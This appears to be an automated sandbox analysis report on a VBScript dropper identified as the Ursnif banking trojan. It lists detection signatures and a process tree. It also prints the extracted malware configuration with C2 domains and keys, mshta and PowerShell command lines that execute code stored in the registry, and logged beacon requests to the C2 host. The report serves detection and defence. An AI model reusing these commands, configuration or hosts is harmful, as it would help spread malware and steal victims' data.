Loading ...

Play interactive tourEdit tour

Windows Analysis Report presentation[2021.09.09_15-26].vbs

Overview

General Information

Sample Name:presentation[2021.09.09_15-26].vbs
Analysis ID:482024
MD5:783f03c1b5f346544c131ea2b164e54d
SHA1:9100e6d4ce0edfcb161552fdf2721835f12470a2
SHA256:683fbb9eb6fd6a0a2bab8471d1be28bd45f0598e1db19dc3f6d7536f1c4b5e8b
Infos:

Most interesting Screenshot:

Detection

Ursnif
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
VBScript performs obfuscated calls to suspicious functions
Yara detected Ursnif
System process connects to network (likely due to code injection or exploit)
Antivirus detection for URL or domain
Found malware configuration
Sigma detected: Powershell run code from registry
Benign windows process drops PE files
Sigma detected: Encoded IEX
Multi AV Scanner detection for dropped file
Hooks registry keys query functions (used to hide registry keys)
Maps a DLL or memory area into another process
Compiles code for process injection (via .Net compiler)
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Creates processes via WMI
Allocates memory in foreign processes
Sigma detected: MSHTA Spawning Windows Shell
Deletes itself after installation
Creates a thread in another existing process (thread injection)
Modifies the export address table of user mode modules (user mode EAT hooks)
Writes registry values via WMI
Writes to foreign memory regions
Suspicious powershell command line found
Modifies the prolog of user mode functions (user mode inline hooks)
Injects code into the Windows Explorer (explorer.exe)
Modifies the context of a thread in another process (thread injection)
Sigma detected: Mshta Spawning Windows Shell
Sigma detected: Suspicious Csc.exe Source File Folder
Modifies the import address table of user mode modules (user mode IAT hooks)
Contains functionality to query locales information (e.g. system language)
Very long cmdline option found, this is very uncommon (may be encrypted or packed)
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Found evasive API chain (date check)
Queries the installation date of Windows
Detected potential crypto function
Contains functionality to launch a process as a different user
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to dynamically determine API calls
Contains long sleeps (>= 3 min)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Drops files with a non-matching file extension (content does not match file extension)
Java / VBScript file with very long strings (likely obfuscated code)
Searches for the Microsoft Outlook file path
Drops PE files
Uses a known web browser user agent for HTTP communication
Launches processes in debugging mode, may be used to hinder debugging
Compiles C# or VB.Net code
Dropped file seen in connection with other malware
Creates a process in suspended mode (likely to inject code)
Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Internet Provider seen in connection with other malware
Stores large binary data to the registry
Contains functionality to query CPU information (cpuid)
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Enables debug privileges
AV process strings found (often used to terminate AV products)
PE file does not import any functions
Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Uses Microsoft's Enhanced Cryptographic Provider
Found WSH timer for Javascript or VBS script (likely evasive script)

Classification

Process Tree

  • System is w10x64
  • wscript.exe (PID: 6040 cmdline: C:\Windows\System32\wscript.exe 'C:\Users\user\Desktop\presentation[2021.09.09_15-26].vbs' MD5: 9A68ADD12EB50DDE7586782C3EB9FF9C)
  • WmiPrvSE.exe (PID: 6484 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
    • rundll32.exe (PID: 4180 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: 73C519F050C20580F8A62C849D49215A)
      • rundll32.exe (PID: 5552 cmdline: rundll32 C:\Users\user\AppData\Local\Temp\fum.cpp,DllRegisterServer MD5: D7CA562B0DB4F4DD0F03A89A1FDAD63D)
        • control.exe (PID: 4504 cmdline: C:\Windows\system32\control.exe -h MD5: 625DAC87CB5D7D44C5CA1DA57898065F)
  • WmiPrvSE.exe (PID: 4832 cmdline: C:\Windows\sysWOW64\wbem\wmiprvse.exe -secured -Embedding MD5: 7AB59579BA91115872D6E51C54B9133B)
  • WmiPrvSE.exe (PID: 1372 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: A782A4ED336750D10B3CAF776AFE8E70)
  • mshta.exe (PID: 3628 cmdline: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>' MD5: 197FC97C6A843BEBB445C1D9C58DCBDB)
    • powershell.exe (PID: 4672 cmdline: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)) MD5: 95000560239032BC68B4C2FDFCDEF913)
      • conhost.exe (PID: 5008 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
      • csc.exe (PID: 2204 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 7044 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESDDD0.tmp' 'c:\Users\user\AppData\Local\Temp\tjafqng0\CSC6B09D7CB2D7045B59F7434F2A8CE445.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • csc.exe (PID: 6736 cmdline: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.cmdline' MD5: B46100977911A0C9FB1C3E5F16A5017D)
        • cvtres.exe (PID: 2092 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 '/OUT:C:\Users\user\AppData\Local\Temp\RESEAC0.tmp' 'c:\Users\user\AppData\Local\Temp\qlsida3o\CSCC809748AA5EB4643A41D26B71B98A016.TMP' MD5: 33BB8BE0B4F547324D93D5D2725CAC3D)
      • explorer.exe (PID: 3424 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
  • cleanup

Malware Configuration

Threatname: Ursnif

{"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000015.00000003.1100831932.0000000005888000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
    00000020.00000003.1179024803.0000016F94C7C000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
      00000015.00000003.1097126029.0000000005888000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
        00000015.00000003.1097248260.0000000005888000.00000004.00000040.sdmpJoeSecurity_UrsnifYara detected UrsnifJoe Security
          00000020.00000000.1176959045.0000000000C90000.00000040.00020000.sdmpJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
            Click to see the 21 entries

            Unpacked PEs

            SourceRuleDescriptionAuthorStrings
            21.3.rundll32.exe.5838d48.2.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
              21.3.rundll32.exe.578a4a0.1.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                21.3.rundll32.exe.58094a0.3.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security
                  21.3.rundll32.exe.578a4a0.1.raw.unpackJoeSecurity_Ursnif_2Yara detected UrsnifJoe Security

                    Sigma Overview

                    System Summary:

                    barindex
                    Sigma detected: Encoded IEXShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3628, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4672
                    Sigma detected: MSHTA Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Michael Haag: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3628, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4672
                    Sigma detected: Mshta Spawning Windows ShellShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3628, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4672
                    Sigma detected: Suspicious Csc.exe Source File FolderShow sources
                    Source: Process startedAuthor: Florian Roth: Data: Command: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline', CommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline', CommandLine|base64offset|contains: zw, Image: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe, ParentCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentProcessId: 4672, ProcessCommandLine: 'C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe' /noconfig /fullpaths @'C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.cmdline', ProcessId: 2204
                    Sigma detected: Non Interactive PowerShellShow sources
                    Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3628, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4672
                    Sigma detected: T1086 PowerShell ExecutionShow sources
                    Source: Pipe createdAuthor: Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research): Data: PipeName: \PSHost.132759974709312803.4672.DefaultAppDomain.powershell

                    Data Obfuscation:

                    barindex
                    Sigma detected: Powershell run code from registryShow sources
                    Source: Process startedAuthor: Joe Security: Data: Command: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), CommandLine|base64offset|contains: , Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: 'C:\Windows\System32\mshta.exe' 'about:<hta:application><script>Wfdc='wscript.shell';resizeTo(0,2);eval(new ActiveXObject(Wfdc).regread('HKCU\\\Software\\AppDataLow\\Software\\Microsoft\\86EC23E5-2D5A-A875-E71A-B15C0BEE7550\\\DeviceFile'));if(!window.flag)close()</script>', ParentImage: C:\Windows\System32\mshta.exe, ParentProcessId: 3628, ProcessCommandLine: 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' iex ([System.Text.Encoding]::ASCII.GetString(( gp 'HKCU:Software\AppDataLow\Software\Microsoft\86EC23E5-2D5A-A875-E71A-B15C0BEE7550').UtilTool)), ProcessId: 4672

                    Jbx Signature Overview

                    Click to jump to signature section

                    Show All Signature Results

                    AV Detection:

                    barindex
                    Antivirus detection for URL or domainShow sources
                    Source: http://atl.bigbigpoppa.com/_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/NwAvira URL Cloud: Label: malware
                    Source: http://atl.bigbigpoppa.com/ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5Avira URL Cloud: Label: malware
                    Source: http://atl.bigbigpoppa.com/fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/WAvira URL Cloud: Label: malware
                    Found malware configurationShow sources
                    Source: 00000015.00000003.1057194752.0000000004AB0000.00000040.00000001.sdmpMalware Configuration Extractor: Ursnif {"lang_id": "RU, CN", "RSA Public Key": "IAodzSkRRXZVbpA8JuABjuUBQvpHiTpdg9dOAQp7bBw4t0xkkPvGywDaeciS3HngU/RkNYsOricM2S0LVvdwWlSJ6FdKpFt6YFFWOrsBfCiNFCtU5v/Ohii1LI6H4/OB/132O4comC2he+ED1d47BeoZGdamjIEdPypU4ReJbSLrCxcRMW03mJzNzM22WWjes9V+fVfZ8lvnVONnlm+2SejHIEhpJMv4VzqUiuRgWDBCh1ovNzO3eDJUiuSU1jFcdmg2ywuZOyDLXh6uuRZonMVTxMoziZw6y80jGvuwDFFQy5TMx6xbKoXdqNSwE60TugFay/vbpOuG0fp4zORCVEe39fTGD2o0Gttx0E5BI4w=", "c2_domain": ["atl.bigbigpoppa.com", "pop.urlovedstuff.com"], "botnet": "2500", "server": "580", "serpent_key": "Do9L8DmcVMtyFi6j", "sleep_time": "5", "CONF_TIMEOUT": "20", "SetWaitableTimer_value": "1"}
                    Multi AV Scanner detection for dropped fileShow sources
                    Source: C:\Users\user\AppData\Local\Temp\fum.cppReversingLabs: Detection: 55%
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_04BC3276 CryptAcquireContextW,memcpy,CryptImportKey,CryptSetKeyParam,memcpy,CryptEncrypt,CryptDecrypt,GetLastError,GetLastError,CryptDestroyKey,GetLastError,CryptReleaseContext,GetLastError,21_2_04BC3276
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdbXP source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdbXP source: powershell.exe, 00000019.00000002.1238604024.000001B6D76F8000.00000004.00000001.sdmp
                    Source: Binary string: c:\Led-Flower\Spell\cotton_point\please.pdb source: wscript.exe, 00000000.00000003.1013379730.000001BA25DFD000.00000004.00000001.sdmp, rundll32.exe, 00000015.00000002.1193389238.000000006FBF4000.00000002.00020000.sdmp, fum.cpp.0.dr
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\tjafqng0\tjafqng0.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
                    Source: Binary string: ntdll.pdb source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp
                    Source: Binary string: ntdll.pdbUGP source: rundll32.exe, 00000015.00000003.1171105183.00000000063F0000.00000004.00000001.sdmp
                    Source: Binary string: 7C:\Users\user\AppData\Local\Temp\qlsida3o\qlsida3o.pdb source: powershell.exe, 00000019.00000002.1238512582.000001B6D7684000.00000004.00000001.sdmp
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E61802 wcscpy,wcscpy,GetLogicalDriveStringsW,GetLogicalDriveStringsW,RtlAllocateHeap,memset,GetLogicalDriveStringsW,WaitForSingleObject,GetDriveTypeW,lstrlenW,wcscpy,lstrlenW,HeapFree,21_2_05E61802
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E51577 FindFirstFileW,lstrlenW,lstrlenW,lstrcpyW,lstrlenW,lstrcpyW,lstrcpyW,FindNextFileW,FindClose,FreeLibrary,21_2_05E51577
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E414A0 wcscpy,lstrlenW,lstrlenW,lstrlenW,memset,FindFirstFileW,lstrlenW,lstrlenW,memset,wcscpy,PathFindFileNameW,RtlEnterCriticalSection,RtlLeaveCriticalSection,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,FindFirstFileW,lstrlenW,FindNextFileW,WaitForSingleObject,FindClose,21_2_05E414A0
                    Source: C:\Windows\SysWOW64\rundll32.exeCode function: 21_2_05E56E4E lstrlenW,FindFirstFileW,lstrlenW,RemoveDirectoryW,DeleteFileW,FindNextFileW,GetLastError,21_2_05E56E4E

                    Networking:

                    barindex
                    Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49833 -> 188.127.235.42:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49833 -> 188.127.235.42:80
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49834 -> 188.127.235.42:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49834 -> 188.127.235.42:80
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49835 -> 188.127.235.42:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49835 -> 188.127.235.42:80
                    Source: TrafficSnort IDS: 2033204 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F) 192.168.2.4:49836 -> 188.127.235.42:80
                    Source: TrafficSnort IDS: 2033203 ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) 192.168.2.4:49836 -> 188.127.235.42:80
                    System process connects to network (likely due to code injection or exploit)Show sources
                    Source: C:\Windows\SysWOW64\rundll32.exeDomain query: atl.bigbigpoppa.com
                    Source: C:\Windows\SysWOW64\rundll32.exeNetwork Connect: 188.127.235.42 80Jump to behavior
                    Source: global trafficHTTP traffic detected: GET /_2Bd0AwZG9XFE1JsQD/cYUPvk3qo/ww4_2FJnUCtl_2FACzcA/gxGADMlKA5cRRoa6VfN/bztGPiRkqBO_2FeJB_2BBD/IZBC0D711zpQe/9l1y4Uwd/xWWDr7ndPnPsd3SHIlHFSP9/fiR_2F5_2B/KN2_2B_2B5ItX8nNz/A90VzmqpXUKU/D_2BBXI_2Fv/Sm1xwqkwGWKzxN/PYriFQN1XTg1Mt_2Fdo2G/CZqhw6Gkw9Ga7J6_/2Bpy6_2BqUSt_2F/vDyCdPXYj3I1xnWURR/qEzCiHG74/IyTcmp76Fgjy6Le_2BYj/rD_2FzgWNQQxd_2BIyQ/7fmZMqR3a8eHDmZNS7_2Fe/dWNBCQOVIE_2F/6naTDq9tL/Nw HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /ls0YKrv_/2BJV6E5mlJLydgYjyupmqAO/ebshbxfLmK/53ueumhRK5uHsu1wq/kpnvHeT3BjeE/FCqvgS3hqwT/mPkNYDb32X1Qkc/N7G1r4IU6bUFNgu5BVVbX/yjbVABqaYeB8_2B_/2Fc9vKfZ4hMWLC_/2F14B5QvoOUabGWCw8/plYcnGyms/aXOFWp0J_2FK_2F8o_2B/CI_2FWn_2BX374n3ww4/TG_2ByfgHphR5COejTHsMy/gz3rKYS9XKGwv/EDh6_2Fg/2ikTmUt7QTCri3TRpRtQJWb/r2fO6KX7SN/6mXIe2jQ1oyEIqRjM/CLsIWaugZB_2/FhqkmGlAeUa/nn8rVI84Q/hCoKY5 HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
                    Source: global trafficHTTP traffic detected: GET /fLZmMbWHBrDjVjdoP/PBIC_2FBgMAC/GLBRSVYh_2B/gOgSU0YMdVq_2B/zcwHoIWkheDXq9xczsBhd/ElAduBsByQvdzYtm/u1rHkcLjXfXx1mz/65IOgBlAGjO7Q3M6vt/veJ56XC29/VYs86CKFiCgfUKe_2BfC/Owi_2FUGONT8UvwdsM8/JqV4Jr0011ZtMPmdvDnIrg/UTgh1kCejVnav/Uy_2FGvp/eeZw5tLTiHgf8fP7rzbZynm/BFygaGjj9P/SHhlv5Dn_2B4k8NOM/1M_2FM_2BW8G/dlVQieXVKAn/Zjy1O5qAJEGMC1/sQMiemHb82h85qSPQL4KI/K6v7yXzTOl7hZz/W HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; rv:90.0) Gecko/20100101 Firefox/90.0Host: atl.bigbigpoppa.com
